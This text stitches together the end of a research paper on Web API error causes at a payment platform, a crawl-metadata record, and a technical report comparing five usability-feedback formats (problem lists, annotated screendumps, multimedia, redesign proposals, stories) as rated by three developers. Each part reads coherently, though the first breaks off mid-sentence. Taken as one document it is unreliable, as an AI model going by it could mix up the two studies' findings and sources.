possible impact on our findings. Similarly, we filtered the data for analysis based on 10 impacted API consumers or more. The filtered data could be explained by faults that would alter the distribution of faults over the causes. For instance, internal faults could occur more often in the data that was filtered out, therefore posing a potential threat to validity. External validity. External validity is concerned with the representativeness of the results outside the scope of the research data: (1) We used API error log data from the Adyen’s platform to determine the fault causes and provide insights into the frequency and impacted consumers of these faults. Since these results are applicable to Adyen only, we cannot generalize these results to faults in other APIs. To reduce this threat we verified the completeness of the fault causes by surveying API consumers. (2) An arbitrary window of 28 days of API error logs was selected for fault analysis and categorization. A different 28 day window could however have resulted in a different set of faults, and a different number of occurrences and impacted consumers. It would be useful to replicate the analysis based on a different time window to investigate the impact on the results. (3) We only obtained 40 survey responses, of which 11 were partial responses. This sample is insufficient to generalize results about integration, detection, handling and prevent practices, and future work would be required for such generalization. providers include not changing too often, keeping usage data of different features and doing blackout tests, which involves disabling old versions for a short time to remind developers that changes in the API are coming. In other work, Espinha et al. [7] developed a tool to understand the runtime topology of APIs in terms of usage of different versions by different users. Wang et al. [25] study the specific case of the evolution of 11 REST APIs, where they collected questions and answers from Stack Overflow that concern the changing API elements and how API clients should deal with evolution. Li et al. [9] identified 6 new challenges when it comes to dealing with web API evolution as opposed to traditional API evolution. This understanding can be useful for maintenance purposes where the impact of changes can be evaluated and predicted. Venkatesh et al. [24] mention that to help the integration process one should understand the challenges that are encountered by client developers. The authors base their analysis on developer forums and Stack Overflow by mining the questions and answers related to 32 Web APIs. They find that the top five topics per Web API category contribute to over 50% of the questions in that category. The findings imply that API providers can optimize their learning resources based on the dominant topics. 7 CONCLUSION API errors can indicate significant problems for API consumers. In the system under study over 60,000 API error responses are returned every day, causing the potential number of problems and their impact on API consumer applications to be enormous. Practitioners have written a variety of best practice guides and blog posts on API design and error handling, however to our knowledge no research had been conducted on what type of API errors occur in practice and what their impact is. Our results show that (1) faults in API integration can be grouped in 11 causes: invalid user input, missing user input, expired request data, invalid request data, missing request data, insufficient permissions, double processing, configuration, missing server data, internal and third party. Each cause can be contributed to one of the four API integration stakeholders: end user, API consumer, API provider, and third parties; (2) most faults can be attributed to the invalid or missing request data, and most API consumers seem to be impacted by faults caused by invalid request data and third party integration; and (3) API consumers most often use official API documentation to implement an API correctly, followed by code examples. The challenges of preventing problems from occurring are the lack of implementation details, insufficient guidance on certain aspects of the integration and insights in problems and changes, insufficient understanding of the impact of problems, missing guidance on how to recover and a lack of details on the origin of errors. Our findings indicate that the integration between API providers and consumers is still far from ideal. We hope this work motivates researchers to further explore the domain of faults in Web API integration. Furthermore, we hope that API providers use our findings to optimize their APIs to enable better integration, and that API consumers use our ideas to reduce the impact that API errors may have on their applications. REFERENCES
{"Source-Url": "https://pure.tudelft.nl/portal/files/42667586/mainwfonts.pdf", "len_cl100k_base": 11819, "olmocr-version": "0.1.50", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 34852, "total-output-tokens": 14362, "length": "2e13", "weborganizer": {"__label__adult": 0.00029158592224121094, "__label__art_design": 0.0003345012664794922, "__label__crime_law": 0.0002491474151611328, "__label__education_jobs": 0.0007977485656738281, "__label__entertainment": 4.845857620239258e-05, "__label__fashion_beauty": 0.00011426210403442384, "__label__finance_business": 0.00028896331787109375, "__label__food_dining": 0.00022494792938232425, "__label__games": 0.0003647804260253906, "__label__hardware": 0.0003592967987060547, "__label__health": 0.0002791881561279297, "__label__history": 0.0001550912857055664, "__label__home_hobbies": 4.38690185546875e-05, "__label__industrial": 0.00017178058624267578, "__label__literature": 0.0001933574676513672, "__label__politics": 0.00016379356384277344, "__label__religion": 0.0002815723419189453, "__label__science_tech": 0.00464630126953125, "__label__social_life": 7.414817810058594e-05, "__label__software": 0.006679534912109375, "__label__software_dev": 0.98388671875, "__label__sports_fitness": 0.00015294551849365234, "__label__transportation": 0.00024139881134033203, "__label__travel": 0.0001342296600341797}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 62520, 0.0437]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 62520, 0.08599]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 62520, 0.90503]], "google_gemma-3-12b-it_contains_pii": [[0, 1332, false], [1332, 7334, null], [7334, 13075, null], [13075, 18901, null], [18901, 23644, null], [23644, 31692, null], [31692, 36918, null], [36918, 39727, null], [39727, 46389, null], [46389, 54029, null], [54029, 62520, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1332, true], [1332, 7334, null], [7334, 13075, null], [13075, 18901, null], [18901, 23644, null], [23644, 31692, null], [31692, 36918, null], [36918, 39727, null], [39727, 46389, null], [46389, 54029, null], [54029, 62520, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 62520, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 62520, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 62520, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 62520, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 62520, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 62520, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 62520, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 62520, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 62520, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 62520, null]], "pdf_page_numbers": [[0, 1332, 1], [1332, 7334, 2], [7334, 13075, 3], [13075, 18901, 4], [18901, 23644, 5], [23644, 31692, 6], [31692, 36918, 7], [36918, 39727, 8], [39727, 46389, 9], [46389, 54029, 10], [54029, 62520, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 62520, 0.07104]]}
olmocr_science_pdfs
2024-11-27
2024-11-27
d5fca1a6a8ffb4a231de38334ff8a3719438c93e
What Makes a Developer's Heart Tick? Characterizing Effective Feedback from Usability Evaluation Mie Nørgaard & Kasper Hornbæk Technical Report no. 07/01 ISSN: 0107-8283 What Makes a Developer’s Heart Tick? Characterizing Effective Feedback from Usability Evaluation Mie Nørgaard & Kasper Hornbæk University of Copenhagen, Denmark December 2006 Abstract The format used to present feedback from usability evaluations to developers affects whether problems are understood, accepted and fixed. Yet, little research has investigated which formats are the most effective. We describe an explorative study where three developers assess 40 usability findings presented using five feedback formats. Data suggest that feedback serve multiple purposes. Initially feedback must be convincing and convey an understanding of the problem. Next, feedback must be easy to use before merely serving as a reminder of the problem. Prior to working with the feedback developers rate redesign proposals, multimedia reports, and annotated screendumps as more valuable than lists of problems, which again are rated more valuable than a scenario type format. After working with the feedback, developers rate the value of formats alike. This reflects how all formats may serve to remind but that redesign proposals, multimedia reports, and annotated screendumps best address feedback’s initial purpose. 1 Introduction Since usability studies became established as an important activity in systems development the effectiveness of usability evaluation methods has been investigated thoroughly (see for instance (Jeffries, Miller, Wharton, & Uyeda, 1991; John & Marks, 1997; Sears, 1997)). The literature reveals a strong focus on comparing usability evaluation methods but how the evaluation results are fed back to a design team has not been the focus of much work, but see (Dumas, Molich, & Jeffries, 2004; Hornbæk & Frøkjær, 2005). This is unfortunate since one goal of usability evaluation is to improve systems. To reach this goal evaluations must move beyond solely listing usability problems (UPs) and help developers to decide which UPs to fix and to understand how to can fix them. In one English dictionary (askoxford.com) feedback is described as: ‘Information given in response to a product, performance etc., used as a basis for improvement’. According to this definition feedback needs to fulfill certain requirements to be successful: the receiver needs to understand the feedback and the feedback needs to facilitate a solution to a given problem. To do this, the feedback needs to be convincing. Consequently there are at least two challenges for an evaluator about to feed back results to a development team: First, developers may not be easily convinced about usability problems, either believing that the system is great as it is, or that users eventually will come around to using it (Kennedy, 1989; Seffah & Andreevskaia, 2003). Second, developers might not be hostile to changes, but simply find it difficult to understand a UP because it is vaguely described (Dumas et al., 2004). How evaluators tackle these two challenges can influence the evaluation’s impact dramatically. The present explorative study aims at contributing to our understanding of the practical use of different feedback formats and thus identify how we more successfully can feed usability findings back to developers. The study investigates how five feedback formats that represent different ways an evaluator may deliver usability results, are used and assessed by developers. The results suggest that developers initially value information in addition to a problem description, such as video highlights, contextual screendumps and redesign proposals, but after having worked with the feedback the differences between feedback formats diminish. We argue that these results are important for usability practitioners as advise for choosing between feedback formats and for researchers as a help to understand the roles of feedback. 2 Related work Related work can be divided into two categories; one characterizing feedback practices and another concerned with feedback research. Below we discuss the two categories in turn. 2.1 Feedback practices To facilitate the improvement of a system, feedback from usability evaluations often include descriptions of a problem’s severity (Kennedy, 1989; Dumas, 1989; Coble, Karat, & Kahn, 1997; Hornbæk & Frøkjær, 2005), the context of the problem (Kennedy, 1989; Nayak, Mrazek, & Smith, 1995), redesign proposals (Jeffries, 1993; Nayak et al., 1995; Dumas et al., 2004; Hornbæk & Frøkjær, 2005), and underlying causes of problems (Dumas, 1989). Practitioners and researchers also agree on the persuasive power of developers seeing users interact with the system (Schell, 1986; Mills, 1987; Dumas, 1989; Redish et al., 2002). Below we describe different approaches to providing feedback. An informal survey on an online forum for usability practitioners suggests that a usability report focusing on a list of problems is perhaps the most common way to feed back usability results to developers. The importance of presenting positive comments together with the UPs is often argued (Dumas et al., 2004). In a problem list each UP may be described by a short text and a severity rating; these ratings may be used to present a top 10-list of the most critical problems to help developers prioritize their work and cut down on the number of problems reported (Dumas, 1989; Nielsen, 1993; Nayak et al., 1995; Redish et al., 2002). A GUI binder is described as a collection of screendumps annotated with recommended usability enhancements (Nayak et al., 1995). This feedback format aims at providing developers with example-based references to support the development process. Nayak et al. (Nayak et al., 1995) describe multimedia presentations as interactive documents that mixes descriptive text with video highlights, pictures and graphics. The information is linked in a structure similar to web pages. As an elaboration of the video highlights used for multimedia presentations, Dumas and Redish discuss a professional video production that resembles video productions as we know them from TV, including a narrator, voiceover and examples from the test (Dumas & Redish, 1999). Redesign proposals are referred to as constructive input, that provides developers with ideas for tackling problems (Hornbæk & Frøkjær, 2005). Redesign proposals can include a brief summary of the redesign, a justification of the proposed design, an explanation of the interaction and design decisions in the redesign and finally illustrations of how the redesign works (Jeffries, 1993; Hornbæk & Frøkjær, 2005). Scenarios can be defined as ‘a succinct story describing a user’s goal, start point, and intermediary factors that relate to product use’ (Kahn & Prail, 1993). They build upon results from real users (Nayak et al., 1995) and task analysis (Nielsen, 1993). Scenarios are only rarely mentioned as a way to provide feedback. This surprise, since their strength is portraying context of use and user behaviour, which are important when understanding a problem. Human-centered stories are one type of scenario. In style they resemble fiction writing using dialogue and describing the characters’ emotions and motivations (Strom, 2003). The value of oral feedback as a means to describe and initiate a dialogue about results is often mentioned in the literature (Butler & Ehrlich, 1993; Kahn & Prail, 1993; Dumas & Redish, 1999). Face-to-face presentation has the power to clear up potential misunderstandings in an engaging and convincing interaction between evaluator and developer. 2.2 Feedback research Based on the lack of studies of feedback and the diversity of formats available we need to study how developers assess feedback from usability evaluation. Cockton recently argued that usability studies are moving from looking at evaluations as merely being problem list generators to also dealing with the problems’ impact (Cockton, 2006). One line of work pointing in this direction is the work concerning downstream utility (John & Marks, 1997; Hornbæk & Frøkjær, 2005; Law, 2006) which concerns the effectiveness with which a solution to a UP is implemented. In a study of downstream utility, Law points to issues such as ‘credibility’ as a key factor for effective feedback (Law, 2006) and describes how developers need to be convinced about for example the evaluator’s expertise before taking the feedback to heart. She suggests that the persuasive power of feedback lies in providing the developers with information about the severity of the usability problem, problem frequency as well as elaborate and accurate problem descriptions. Redesign proposals and an estimated fixing effort are also mentioned to be of importance for good feedback. At the opening plenary at the Usability Professionals Association Annual Meeting in 1993, Jared Spool from the consultancy User Interface Engineering suggested that usability professionals take a closer look at how they deliver usability feedback, arguing that evaluators should ‘take their own medicine’ when it comes to the usability of their feedback (as referred in (Nielsen, 1994)). A recent special issue also called for more research on the ‘various form of feedback in which the results of usability evaluation is presented to developers’ in order to examine persuasiveness and impact (Hornbæk & Stage, 2006). This explorative study aims at investigating how such various formats convince developers and provide them with an understanding of usability problems. The short-term goal is to get better knowledge of how evaluators should present their feedback to developers in order for it to be understood and used. The long-term goal is to make evaluation a more powerful player in software development, something only rarely the case today (Hornbæk & Stage, 2006). 3 Method To identify effective ways of providing feedback, we investigated how five different feedback formats influence usability work in a Danish company. This setup was chosen because it allowed us to study a running system in realistic settings and provided an opportunity to investigate how developers assess feedback when first presented to them, and how they rate the same feedback once they have worked with it. The explorative study was performed in eight steps. The system was tested, problems identified and merged into groups. The problem descriptions were then formatted according to five feedback formats and developers assessed these on five questions. The developers worked with the feedback, assessed it and were finally interviewed about their assessments. The eight steps are described in detail below (see also Figure 1 and 2). As the five questions show (question 1-5, Table 2) the study was designed to investigate how different feedback formats convinced and provided developers with an understanding of the usability problems. We hypothesised that the first impressions of the feedback and the ratings after use (referred to as pre and post use) would vary, since working intensively with a format might bring the developers to appreciate certain qualities of a format. We also expected the study to provide qualitative data on how to improve feedback from evaluations to developers. The company in question is Jobindex, a non-hierarchically organised company with 37 employees who provides web based services related to job searching. The three developers who participated in the explorative study comprise the development team concerned with systems development. 3.1 Step one – testing the application A think aloud test of the system comprised six test sessions and followed the guidelines of (Dumas & Redish, 1999). Jobindex identified the area of interest and approved the tasks for the test. The test sessions were recorded on digital video using a webcam and Tech Smith’s Morae software. The goal of the test was to sample a set of usability findings for the study, not to uncover every issue in the application. 3.2 Step two – analysing the results To identify UPs, the two evaluators discussed and analysed the test results immediately after each test session, as recommended by (Nørgaard & Hornbæk, 2006). After the six sessions usability findings were consolidated and described with a title, a description of the problem, severity, the context in which the problem occurred and one or more redesign ideas. As recommended by Dumas and Redish (Dumas & Redish, 1993) we included positive findings (PFs). At the end of step two 75 usability findings had been described, comprising 67 UPs and eight PFs. 3.3 Step three - merging usability findings into 40 groups To eliminate doublets, the 75 usability findings were merged into groups of related problems. The usability findings were merged by rough similarity until 40 groups had emerged. This limit was set to ensure that the developers would get experience in working with each feedback format during step six in the study. Each group consisted of one to six usability findings. 3.4 Step four – turning the findings into feedback items We chose to investigate five feedback formats that represent different approaches to providing feedback from evaluations. As mentioned above, formats were chosen based on our literaturs review and an informal survey amongst practitioners. The list of problems (P) consists of a description and a severity rating of the UPs. Severity is rated according to a five-step scale (Dumas, 1989). The format is included in the study since it is a common way to present usability feedback that can be produced at low cost. The problem list took approximately half a day to prepare. The GUI binder (G) consists of screendumps annotated with information about where the UP occurred, a brief description of the UP and a description of one or more possible solutions. The GUI binder is included in the study because it can be produced at a fairly low cost and because it primarily focusses on presenting the context of the problem and only briefly touches upon possible redesign issues. The GUI binder took approximately one day to prepare. The **multimedia presentation (M)** consists of linked html-documents containing a description of the problem, a video with examples of user interaction, a description of one or more solutions, a graphical illustration of severity, illustrative drawings that help to skim the content, illustrations of both problem and possible solution, and finally a short explanation of the illustrations. This format is included in the study because it addresses the recommendations to let developers see real users interact with the system. Also, the multimedia presentation might be more enjoyable to work with since it presents its information in an engaging and varied manner. The multimedia presentation took approximately three days to prepare. The **redesign proposals (R)** consist of a brief description of the UP, a description of one or more solutions, a justification of the solutions, illustrations of the solutions and finally a short text explaining the illustrations. Redesign proposals are included because justifications ought to make them a convincing format and the ideas for solutions ought to improve the understanding of the UP and facilitate the actual fixing of the problems. The redesign proposals took approximately a day and a half to prepare. Representing scenarios in this study we chose to use **human-centered stories (H)**. These are expected to be persuasive and to provide valuable information about the context of use. In this study a human-centered story is approximately one page long and consists of six lines of introduction (presenting the characters and ‘setting the stage’) and a narrative that describes a problem, the context and the user’s motivation and feelings in the situation. The human-centered stories took approximately two days to prepare. The feedback was presented to the developers on paper (formats PGRH) and CD-rom (format M). We found this most flexible and according to practice. Despite numerous recommendations to interact with developers (Butler & Ehrlich, 1993; Kahn & Prail, 1993; Dumas & Redish, 1999), this explorative study refrains from studying oral feedback. This is not to underestimate the high value of oral feedback, but to emphasize the importance of the deliverables that support the oral feedback and serve as documentation and a reminder for developers during their work. 3.4.1 Producing comparable feedback items The five formats PGMRH comprise a combination of different descriptive elements such as text, illustrations and severity ratings. We produced a series of descriptive elements to be copy-pasted when we constructed the feedback according to the five formats. We did this to improve the comparability between the formats. For example, the same rating would be used for all formats using severity ratings. Step four resulted in a total of 200 so-called feedback items, comprising 35 UPs and 5 PFs described by five feedback formats (see Figure 1). 3.5 Step five – Pre use rating of feedback items In order to rate the value of the feedback items, the 200 items were presented to three developers at Jobindex who usually receive and take care of usability feedback. A description of the test set-up, the participants and the tasks were also provided. The 200 items were presented in random order so that no one feedback format was favoured by being presented first. Each feedback item was presented with a rating sheet where each developer individually would assess every feedback item according to the questions in Table 2. The questions were intended to shed light on issues such as usefulness, persuasive power and clarity; issues that are crucial for the feedback’s quality. To answer the questions, the developer would mark a point on a 100 mm horizontal line. Each end of the line was marked with the labels shown in parenthesis after the questions (e.g., ‘very poorly’/’very well’). This method of measuring is inspired by (Frøkjær & Hornbæk, 2005) and let the developers answer the questions without being constrained by a small number of categories on the scale. The scale is quantified by measuring the millimetres from the start point to the point on the line marked by the developer. Each developer used approximately four hours rating the feedback items. 3.6 Step six – putting the feedback items into action After developers had rated their first impressions of the feedback we wanted to study how they would use the feedback in their daily work. Each developer received a set of the 40 usability findings; 32 usability findings in print (covering equally feedback formats PGRH) and the remaining eight usability findings on a CD-rom (M). The feedback items were selected at random from the set of 200 feedback items produced in step four. The developers were instructed to carry out their work on the system as if they had received any other usability report. This was done so the developers could familiarize themselves with and perhaps change their opinions about some of the feedback items once they got experienced using them. The developers worked with the feedback items for approximately 12 weeks inbetween their other tasks at Jobindex. 3.7 Step seven – Post use rating of feedback items Having finished the work on the system the developers repeated step five, this time rating just the 40 feedback items they had been working with, keeping their actual work experiences in mind. Each developer used approximately one and a half hours on this task. 3.8 Step eight – individual interviews Finally, developers were interviewed individually. They were presented with and asked to discuss examples of the feedback items they had rated highest and lowest. They were also asked to discuss the significance of positive findings. Finally they were asked to perform a card sorting exercise in which they discussed the value of feedback elements such as severity ratings, video and contextual screendumps. The aim of the interviews was to get finer nuances on the developers’ opinions, collect anecdotal data about their experiences with the feedback formats, and collect ideas for improving feedback on usability evaluation. During the interviews, points and opinions were captured directly on the relevant feedback items. The interviews were afterwards documented with thorough notes, two of the interviews were additionally audio recorded. 4 Results 4.1 Pre use rating Table 1 presents an overview of developers’ mean pre use ratings of the five feedback formats. To protect the experiment-wide error, we first analyzed the pre use ratings using analysis of variance (ANOVA). This test suggests significant differences between feedback formats (see Table 1). Post hoc tests point to redesign proposals, the multimedia presentation and the GUI binder as being rated equal and significantly better than the problem list, which in turn is rated better than human-centered stories. To illustrate this developers rate redesign proposals highest in 40% of the cases, multimedia presentation in 31% of the cases, GUI binder in 23% of the cases, and the problem list in 6% of the cases. Human-centered stories were never rated highest. To investigate these differences we conducted individual analysis of variance on each question. Table 2 shows how the significant groups change between questions. Of the three top-rated formats (GMR), R is rated significantly higher than M on a question concerning whether a feedback item helps the developer solve the problem. M seems on the other hand to be slightly better at convincing the developer about the problem. The difference to G and R is not significant though. Despite the small variances on questions the ratings generally support the picture from Table 1 of the GUI binder, the multimedia presentation and redesign proposals as being the most valued feedback formats. We found no significant correlation between order of presentation and ratings, $F(7,167) = 0.54, p<.921$, suggesting that having seen other presentations of a UP does not affect how a developer rates a feedback item. 4.2 Post use ratings Table 1 also shows the mean ratings developers made of the five feedback formats after having worked with them for three months. An overall MANOVA shows that there are no significant differences in how the five formats are rated after use. An analysis of the ratings of each specific question confirmed the result. A comparison of the ratings given to identical feedback items pre and post use (Figure 3) show that all five questions receive lower ratings in the post use rating. The only exception is human-centered stories (H), which generally receive the same rating. 4.3 Interviews We analyzed and consolidated the notes from the interviews into 14 groups of similar opinions. Four of these identified general parameters that make feedback useful to developers; the problem can be recognized, the problem is easy to fix, the feedback contains much information about the problem’s context and the feedback is quick and easy to use. Ten groups concerned the feedback formats (Table 4). 4.3.1 General findings – explaining high and low ratings The interviews showed that the top rated feedback items had some general characteristics in common. First, the problems were recognizable to the developer, meaning that the developer knew about them already. As an example developer 3 (Dev3) explains: ‘This is a much more recognizable problem. I know it is annoying. It is a problem I have been in contact with before’. Second, the problems that received high ratings were considered easy to fix: ‘It’s a change that can be easily overcome…that’s why it has a higher rating’ (Dev3). Six out of ten high rated feedback items were explained with the fact that developers agreed with the problem. Five of ten high rated feedback formats were explained with problems being easy to fix. The lowest rated feedback items also showed similarities. A low rated feedback item often described a problem that was hard to recognize either because the developer was not convinced about the problem, or because he needed more contextual information to understand it. Dev2 points to one reason for not being convinced and wanting more context about a problem: ‘I am not able to deduct the cause of the problem from this feedback’. Five of ten low rated feedback items were explained with the fact that the developer disagreed with the problem or found it impossible to solve. Developers explained four of ten low rated items with not being able to understand the problem for example; ‘I have trouble understanding what it is… I mean what search words the user typed… I understand that the user has typed something and has an expectation about finding something… but I have a hard time understanding what it is’ (Dev1). Generally developers value the access to contextual information and several formats are criticized for not describing enough context. ‘I need to know more’ Dev 1 points out when discussing several low rated feedback items. Conversely, formats heavy on context are not without problems. Feedback formats, which elaborate on context of use are either criticized for being tedious to use (M) or rated poorly throughout the explorative study (H). This suggests that developers consider the format’s ease of use an important parameter when assessing how a format performs. 4.3.2 Details on the five formats Developers criticize human-centered stories for being time consuming and ‘full of noise’, as Dev1 puts it. Dev3 joins the criticism with the view that H does not really help to fix the problem and that it is often difficult to understand what the problem is. ‘It does surprise that you can still be unsure of what the problem is after having read the long text’, he explains. On the positive side H ‘shows you where you loose the user’ (Dev1) and provide contextual information about the UP, which help to understand the problem (Dev2). Problem lists are considered fully sufficient for presenting uncontroversial UPs, and Dev2 describes how he uses the severity rating to estimate whether he is ‘on the same level as the evaluator’. This is an important part of convincing him about the nature of the problem. Dev3 criticize P for lacking contextual information: ‘The problem has been boiled down to one line of text. It can be difficult to understand [the problem] because the description is too short and is does not include any description of context, suggestions for solutions or anything. I often catch myself thinking ‘what am I supposed to do with this?’ The multimedia presentation is mostly valued for the videos by Dev2 who explains how videos provide fine nuances about the context and the use of the system. Dev1 and Dev3 on the other hand values the possibility to dig into a video, but find that the UPs are generally easily understood without seeing the video. They find that describing simple UPs with video unnecessary and criticize M for being too time consuming because of the videos. Dev1 explained how he found the video in M tedious because it was difficult to get a quick overview and to skim the content: ‘I cannot fast forward to the point of the video’ he criticizes. He suggests providing a textual description of the video’s story line, using H as a model. Dev3 supports this idea. The developers do not find that graphical illustrations add any value and call for more thoroughly explained severity ratings. Dev1 comments on G that screendumps are often easier to understand than text. Dev2 repeats this point for the textual redesign proposals; text can be difficult to understand, and an illustration of the redesign proposals as support for the text is desired. Dev2 explains how the redesign proposals in R make it easier to understand and accept the critique. He explains how the fact that the evaluator has to illustrate his redesign ideas improves the quality of these. All three developers agree that the justification for the redesign proposal is unnecessary: ‘A good idea should speak for itself’, according to Dev1. The feature of directly pointing to where the UP occurred received positive comments from all three developers. Dev2 explained how M let him jump from the problem description to an illustration of where the problem occurred, and that this setup was very easy to act on. Dev3 points out a positive feature of G: ‘It gets pinpointed where it [the problem] is’. Formats RGM all include the feature of illustrating where the UP occurred. 4.4 UP characterization The ratings of different feedback formats may depend on the nature of the problems. To investigate this five researchers rated the 35 UPs according to (a) discoverability; how easily they were discovered and (b) complexity; the perceived complexity of fixing the problem. Discoverability was coded according to the scale perceptible, actionable and constructable (Cockton & Woolrych, 2001). Complexity was coded with inspiration from (Hornbæk & Frøkjær, 2004) using a three-step scale comprising complex, medium-sized and simple problems. The average complexity-discoverability ratio is shown in Table 4, and suggests that the UPs used in this study are mostly simple and perceptible/actionable. To get an impression of whether the most heavyweight UPs were rated differently than the rest of the UPs we studied the ratings of the six UPs from the bottom-right corner of Table 3. In average the heavyweight UPs were rated 8% lower than the rest of the UPs pre use, though this difference is not significant, \( F(1,173)=1.757, p>.1. \) 4.5 Low answering rate for PFs In average each developer answered 95% of the questions pre use and 98.5% post use. The only apparent pattern in the unanswered questions was a low answering rate for PFs. This phenomenon can be explained by the fact that three of the five questions specifically concerned UPs. In the interviews the developers expressed general satisfaction with receiving PFs, and pointed to the fact that it is nice to know which parts of the system that work and should not be changed. Dev2 also mentioned the psychological effect of combining negative with positive feedback in order for the critique to be ‘easier to swallow’. 5 Discussion 5.1 Comparing feedback formats Our explorative study suggest that the multimedia presentation, the GUI binder and the redesign proposals were generally seen as useful input to developers’ work, whereas the human-centered stories were not well received. The problem list was generally rated lower than the three top formats and higher than the human-centered stories. The explorative study suggests that feedback serve several functions, which change over time. Understanding the problem and being convinced about it is of initial importance to feedback. Information about a problem’s context plays a role for both understanding and a problem’s ability to convince. It elaborates the problem, making it easier to understand, and provides information on what caused the problem thus making it more convincing. When the developer is convinced about the problem and understands it, whether the feedback is easy to use gains importance. Ease of use and thorough contextual information seem quickly to conflict however. When the developer has worked with the problem for a while the feedback finally needs to serve as a reminder to the developer. Below we discuss how the five feedback formats relates to these issues. The problem list is generally rated lower than the GUI binder, the multimedia presentation and redesign proposals, suggesting that the most commonly used feedback format is not the most effective one. Descriptions of problems seem best suited for communicating simple and uncontroversial UPs where no contextual information is needed. We argue that some of the recommendations to improve problem lists such as ‘be more positive, clear, precise and respectful’ (Dumas, 1989) do not fully address the challenges associated with the problems list. Problem lists do not provide any explanations to bolster its problem description and the format’s ability to convince seems mostly to rest on the evaluator’s ethos and assertiveness. We found that developers used severity ratings to assess the evaluator’s credibility and conclude that well argued severity ratings make problem lists more credible. The GUI binder, which can be produced at fairly low cost, is generally rated equal to the multimedia presentation and redesign proposals. Seemingly, the context provided by the annotated screendumps is valued greatly by developers either as facilitating a better understanding of the problem. The GUI binder only shows where the problem occurred and gives no information about what led to the problem e.g., compared to the multimedia presentation. This suggests that information about problem occurrence is more important to developers than contextual feedback about for instance users’ interactions with the system. The multimedia presentation proved less convincing than suggested by the literature on highlights videos. ‘Seeing is believing’ is a common argument for videos (Desurvire & Thomas, 1993) but our explorative study suggest that other formats are equally convincing. Developers call for an easier access to contextual information than video. However, this critique acknowledges contextual information like the one presented by the videos in the multimedia presentation as being important to understanding the problems. The high ratings of redesign proposals suggest that they serve as a valuable elaboration of the problem description that makes the UP more understandable to developers. This supports the findings of (Hornbæk & Frøkjær, 2005) and suggests that the quality of descriptions of even fairly simple problems is heightened by redesign proposals. The psychological effect of receiving constructive suggestions rather than negative criticism may explain why developers find the format convincing, an important quality overlooked by (Hornbæk & Frøkjær, 2005). Human-centered stories may perform poorly on the feedback dimension of understanding because they demand the reader to analyze and interpret the narrative before being able to understand the problem. The fictional style of the presentation might also be problematic since it apparently is found unconvincing by developers, something that might be addressed by modifying the narrative style of writing. Human-centered stories are not designed for providing feedback on usability problems however. 5.2 Feedback issues of importance to developers The explorative study suggests that developers rate UP that they agree with higher than the ones they do not agree with. This finding underlines the importance of feedback formats’ ability to convince. Easily fixed problems seem also to be rated higher than problems that are not easily fixed. This finding supports reports on how developers have a tendency to favour the problems easiest to correct (Dumas & Redish, 1999). We were surprised to find that heavyweight UPs were rated lower than lightweight ones since we expected heavyweight problems to be of more importance to system development and thus to developers. Developers value contextual information, which may explain why the multimedia presentation, GUI binder and redesign proposals, which all describe context such as problem occurrence, are initially preferred by developers. The need for contextual information is linked to developers’ wish to investigating certain UPs in depth in order to obtain a better understanding of the problem or to search for convincing factors about the problem. 5.3 Differences in pre and post ratings The differences in how developers rate feedback formats diminish after they have worked with the feedback items. Since we expected the developers to familiarize themselves with and develop preferences for certain formats during their work with the UPs, we were surprised to find that the post use rating showed no significant differences between the ratings of formats. Developers assessed the same questions before and after having worked with the problems. We hypothesize that the questions were perceived differently pre and post use. As we have no way of knowing, we will refrain from speculating what the difference in meaning is. We dare to conclude that when first learning about and having to understand a problem the GUI binder, the multimedia presentation and redesign proposals are superior to problems lists and human-centered stories. However, any of the formats serve as a reminder of that problem. The change in the role and rating of feedback over time suggests that studies solely concerning pre use evaluation results are problematic. We suggest future work on the various stages and roles of feedback. 5.4 Ideas for improving feedback Developers seem sensitive to information overload and we need to investigate how thorough contextual information can be presented in the least overwhelming manner. A multimedia presentation providing the possibility to study relevant and discard irrelevant information might be a solution. Indexed videos might speed up navigation in a short highlights video, but the solution does not remedy that some problems are poorly explained in a short video. Summaries of the videos modeled over human-centered stories (as a kind of reverse video manuscript) might improve ease of use of contextual information and leave room for the evaluator to elaborate on the problems difficultly illustrated with video. However since human-centered stories are not considered highly convincing this idea is not without problems. Longer problem descriptions with elaboration of the causes of the problem might also improve problem lists. Screendumps of where the problem occurred seem also to be valued information easily produced and may for GUI problems serve as reference for a redesign proposal. 6 Conclusion The present explorative study aims to investigate how five feedback formats serve to convince and provide an understanding of usability problems. The study suggests that feedback serves multiple purposes, which change over time. Initially feedback needs to convince developers and help them understand the problem. The degree to which a feedback format provides contextual information is crucial to how well it succeeds in convincing and explaining the problem. Having accomplished that, feedback must be easy to use in the developers’ daily work. Hereafter it (Dumas & Redish, 1993) mainly serves as a reminder of the usability problem. Developers rate the multimedia presentation, redesign proposals and the GUI binder with annotated screendumps highest on first hand impression. However, after having worked with the feedback developers rate problem lists, the GUI binder, the multimedia presentation, redesign proposals and the scenario format human-centered stories alike. The findings suggest that all feedback formats may serve as a reminder, but only some provide the information needed to be convincing and helpful in understanding the problem. Problem lists, that are perhaps the most common feedback format, do not provide sufficient information to perform well on first hand impressions, and need to include additional information before providing developers with efficient feedback. Tables and figures (in order of reference) Figure 1: The study consists of eight steps. The figure show how the usability test (step 1) is followed by analysis of 75 UPs (step 2) and merging these into 40 UPs (step 3). Finally five feedback items are constructed for each UP, a total of 200 items 